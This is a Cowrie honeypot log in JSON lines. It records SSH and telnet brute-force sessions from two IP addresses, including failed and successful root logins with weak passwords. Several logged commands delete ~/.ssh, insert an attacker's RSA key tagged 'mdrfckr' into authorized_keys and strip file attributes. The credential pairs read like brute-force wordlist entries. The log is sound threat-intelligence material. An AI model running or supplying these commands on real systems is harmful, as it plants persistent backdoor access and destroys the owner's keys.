{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.833638Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.993018Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:44.993954Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40290,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dab921e11b0","protocol":"ssh","message":"New connection: 212.227.235.229:40290 (1.2.3.4:22) [session: 5dab921e11b0]","sensor":"my-vps","timestamp":"2025-09-08T13:07:45.178707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:45.179522Z","src_ip":"212.227.235.229","session":"5dab921e11b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:45.352548Z","src_ip":"212.227.235.229","session":"5dab921e11b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:07:46.091188Z","src_ip":"212.227.235.229","session":"5dab921e11b0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:47.273888Z","src_ip":"212.227.235.229","session":"5dab921e11b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40292,"dst_ip":"1.2.3.4","dst_port":22,"session":"389dcd59dab8","protocol":"ssh","message":"New connection: 212.227.235.229:40292 (1.2.3.4:22) [session: 389dcd59dab8]","sensor":"my-vps","timestamp":"2025-09-08T13:07:47.423650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:07:47.424359Z","src_ip":"212.227.235.229","session":"389dcd59dab8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:07:47.582395Z","src_ip":"212.227.235.229","session":"389dcd59dab8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:07:48.256068Z","src_ip":"212.227.235.229","session":"389dcd59dab8"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:48.415360Z","src_ip":"212.227.235.229","session":"d2015ed60e7e"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:07:48.416291Z","src_ip":"212.227.235.229","session":"389dcd59dab8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47656,"dst_ip":"1.2.3.4","dst_port":23,"session":"867a39627ce7","protocol":"telnet","message":"New connection: 212.227.235.229:47656 (1.2.3.4:23) [session: 867a39627ce7]","sensor":"my-vps","timestamp":"2025-09-08T13:07:49.552387Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60732,"dst_ip":"1.2.3.4","dst_port":22,"session":"b733cf37aef1","protocol":"ssh","message":"New connection: 134.199.174.250:60732 (1.2.3.4:22) [session: b733cf37aef1]","sensor":"my-vps","timestamp":"2025-09-08T13:08:02.702349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:08:02.703362Z","src_ip":"134.199.174.250","session":"b733cf37aef1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:08:03.028843Z","src_ip":"134.199.174.250","session":"b733cf37aef1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234567890","message":"login attempt [ubuntu/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:08:04.014162Z","src_ip":"134.199.174.250","session":"b733cf37aef1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:05.319085Z","src_ip":"134.199.174.250","session":"b733cf37aef1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39698,"dst_ip":"1.2.3.4","dst_port":22,"session":"1704f1e91df1","protocol":"ssh","message":"New connection: 212.227.235.229:39698 (1.2.3.4:22) [session: 1704f1e91df1]","sensor":"my-vps","timestamp":"2025-09-08T13:08:19.163595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:19.164243Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:19.426468Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.session.closed","duration":30.56219482421875,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:20.114473Z","src_ip":"212.227.235.229","session":"867a39627ce7"}
{"eventid":"cowrie.login.success","username":"root","password":"asterisk","message":"login attempt [root/asterisk] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:08:20.539221Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:08:21.149355Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:08:21.150192Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:08:21.151503Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:21.414013Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:08:21.961053Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:08:21.961725Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:08:22.224936Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:22.225783Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39710,"dst_ip":"1.2.3.4","dst_port":22,"session":"83184c1b5f81","protocol":"ssh","message":"New connection: 212.227.235.229:39710 (1.2.3.4:22) [session: 83184c1b5f81]","sensor":"my-vps","timestamp":"2025-09-08T13:08:22.485616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:22.486336Z","src_ip":"212.227.235.229","session":"83184c1b5f81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:22.748305Z","src_ip":"212.227.235.229","session":"83184c1b5f81"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:08:23.854187Z","src_ip":"212.227.235.229","session":"83184c1b5f81"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:25.119127Z","src_ip":"212.227.235.229","session":"83184c1b5f81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41934,"dst_ip":"1.2.3.4","dst_port":22,"session":"122ccea138e4","protocol":"ssh","message":"New connection: 212.227.235.229:41934 (1.2.3.4:22) [session: 122ccea138e4]","sensor":"my-vps","timestamp":"2025-09-08T13:08:25.494738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:25.495620Z","src_ip":"212.227.235.229","session":"122ccea138e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:25.859104Z","src_ip":"212.227.235.229","session":"122ccea138e4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:08:27.361294Z","src_ip":"212.227.235.229","session":"122ccea138e4"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:27.725707Z","src_ip":"212.227.235.229","session":"1704f1e91df1"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:08:27.726569Z","src_ip":"212.227.235.229","session":"122ccea138e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35280,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44692c8fe77","protocol":"ssh","message":"New connection: 212.227.235.229:35280 (1.2.3.4:22) [session: b44692c8fe77]","sensor":"my-vps","timestamp":"2025-09-08T13:08:30.871482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:08:30.872280Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:08:31.006574Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei12345","message":"login attempt [root/huawei12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:08:31.579149Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:08:31.895100Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:08:31.895817Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:08:31.896735Z","src_ip":"212.227.235.229","session":"b44692c8fe77"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55680,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db0d2c40ef7","protocol":"ssh","message":"New connection: 134.199.174.250:55680 (1.2.3.4:22) [session: 6db0d2c40ef7]","sensor":"my-vps","timestamp":"2025-09-08T13:08:31.898367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:08:31.899311Z","src_ip":"134.199.174.250","session":"6db0d2c40ef7"}
